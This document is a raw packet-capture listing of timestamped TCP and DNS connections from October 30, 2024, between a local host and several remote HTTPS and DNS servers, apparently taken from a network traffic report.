                                                Oct 30, 2024 00:21:59.171703100 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.171780109 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.173502922 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.173511982 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.173923969 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.175177097 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.215337992 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.422100067 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.422240019 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.422323942 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.423158884 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.423175097 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:59.423187017 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:59.423192024 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:22:04.003283024 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:04.003345966 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:04.003424883 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:04.004760027 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:04.004785061 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:05.140703917 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:05.140798092 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:05.146224022 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:05.146234989 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:05.146656990 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:05.200268984 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:05.842561007 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:05.883337021 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218573093 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218605995 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218614101 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218632936 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218641996 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218648911 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218672037 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.218693972 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.218708992 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.218738079 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.219558954 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.219629049 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.219635963 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.262773037 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.343540907 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.343624115 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.343672991 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.923870087 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.923899889 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:06.923916101 CET49743443192.168.2.44.175.87.197
                                                Oct 30, 2024 00:22:06.923923016 CET443497434.175.87.197192.168.2.4
                                                Oct 30, 2024 00:22:09.022464991 CET6133153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:09.030349970 CET53613311.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:09.030555964 CET6133153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:09.038043976 CET53613311.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:09.629314899 CET6133153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:09.637079000 CET53613311.1.1.1192.168.2.4
                                                Oct 30, 2024 00:22:09.637167931 CET6133153192.168.2.41.1.1.1
                                                Oct 30, 2024 00:22:16.192660093 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.192707062 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.192781925 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.194933891 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.194953918 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.808533907 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.809001923 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.809057951 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.810185909 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.810272932 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.812875032 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.812964916 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.813107967 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.813127995 CET44361332172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.813230038 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.813258886 CET61332443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.813843966 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.813904047 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:16.813985109 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.814204931 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:16.814239025 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.438492060 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.449285984 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:17.449332952 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.450443029 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.450526953 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:17.451623917 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:17.451702118 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.451978922 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:17.451997995 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:17.492573023 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.061850071 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.061959982 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.061997890 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.062057972 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.062139034 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.062139034 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.062184095 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.062479019 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.062542915 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.062561035 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.063046932 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.063122034 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.063136101 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.075478077 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.075551987 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.075644016 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.076121092 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.076153994 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.115070105 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.115091085 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.160586119 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.180403948 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.228015900 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.228033066 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.273977041 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.292208910 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.292474031 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.292589903 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.292607069 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300039053 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300116062 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300121069 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.300134897 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300190926 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.300199986 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300306082 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.300364017 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.300565958 CET61336443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.300578117 CET44361336172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.328568935 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.328609943 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.328699112 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.331351042 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.331367970 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.331996918 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.332034111 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.332103014 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.332546949 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.332565069 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.338495016 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.338534117 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.338589907 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.339091063 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.339107037 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.690224886 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.690514088 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.690545082 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.692014933 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.692095041 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.693195105 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.693427086 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.693434954 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.738478899 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.738507986 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.784157038 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.838305950 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.838722944 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.838785887 CET4436133735.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.838869095 CET61337443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.841515064 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.841543913 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.841612101 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.841933012 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:18.841943979 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:18.940495014 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.940819979 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.940835953 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.942178965 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.942267895 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.942636967 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.942648888 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.942717075 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.942754984 CET44361339172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.942820072 CET61339443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.943180084 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.943226099 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.943290949 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.943485975 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.943502903 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.948103905 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.948323011 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.948355913 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.949385881 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.949454069 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.949836969 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.949867964 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.949906111 CET44361340172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.949935913 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.949959993 CET61340443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.950201035 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.950242996 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.950304985 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.950485945 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.950499058 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.956238985 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.956453085 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.956480026 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.957542896 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.957612038 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.957932949 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.957947016 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.957978010 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.957990885 CET44361341172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.958035946 CET61341443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.958276033 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.958312988 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:18.958368063 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.958554029 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:18.958571911 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.458590984 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.459042072 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.459074020 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.460555077 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.460630894 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.460911036 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.461005926 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.461054087 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.507354021 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.508131981 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.508164883 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.550380945 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.550640106 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.550664902 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.551640987 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.551712990 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.552027941 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.552083015 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.552236080 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.552242994 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.555006981 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.565273046 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.565489054 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.565530062 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.566581964 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.566641092 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.566931009 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.566998005 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.567105055 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.567117929 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.570533991 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.570786953 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.570806980 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.571867943 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.571938992 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.572345018 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.572407007 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.572503090 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.572515011 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.601865053 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.609030008 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.609338999 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.609386921 CET4436134235.190.80.1192.168.2.4
                                                Oct 30, 2024 00:22:19.609453917 CET61342443192.168.2.435.190.80.1
                                                Oct 30, 2024 00:22:19.617492914 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.617520094 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.713052034 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.713115931 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.713169098 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.713819981 CET61346443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.713845968 CET44361346172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.716154099 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.716206074 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.716300011 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.716581106 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.716598988 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.717489958 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.717797041 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:19.717957973 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.719443083 CET61344443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:19.719465017 CET44361344172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.218943119 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.219059944 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.219122887 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.220480919 CET61345443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.220503092 CET44361345172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.309561014 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.309611082 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.309797049 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.310112000 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.310131073 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.330683947 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.330977917 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.331012964 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.332525969 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.332596064 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.332927942 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.332947969 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.332998037 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.333012104 CET44361347172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.333064079 CET61347443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.333369970 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.333417892 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.333478928 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.333667040 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.333683014 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.611174107 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:20.611207962 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:20.611278057 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:20.611494064 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:20.611507893 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:20.908562899 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.908871889 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.908922911 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.909939051 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.910027027 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910362959 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910362959 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910439968 CET44361348172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.910456896 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910511971 CET61348443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910865068 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.910904884 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.910969973 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.911165953 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.911180019 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.947735071 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.948043108 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.948059082 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.949285030 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.949356079 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.949668884 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.949764013 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.949816942 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:20.949825048 CET44361349172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:20.997189045 CET61349443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.474153996 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:21.474442005 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:21.474455118 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:21.475450039 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:21.475518942 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:21.476533890 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:21.476587057 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:21.524825096 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.525088072 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.525098085 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.528620005 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.528700113 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.528995037 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.529150009 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.529155016 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.529170036 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.530745029 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:21.530752897 CET44361350142.250.185.228192.168.2.4
                                                Oct 30, 2024 00:22:21.577538967 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.577553034 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.577589989 CET61350443192.168.2.4142.250.185.228
                                                Oct 30, 2024 00:22:21.624198914 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.664002895 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.664330006 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.664410114 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.664421082 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.664501905 CET44361351172.67.148.212192.168.2.4
                                                Oct 30, 2024 00:22:21.664552927 CET61351443192.168.2.4172.67.148.212
                                                Oct 30, 2024 00:22:21.664560080 CET44361351172.67.148.212192.168.2.4
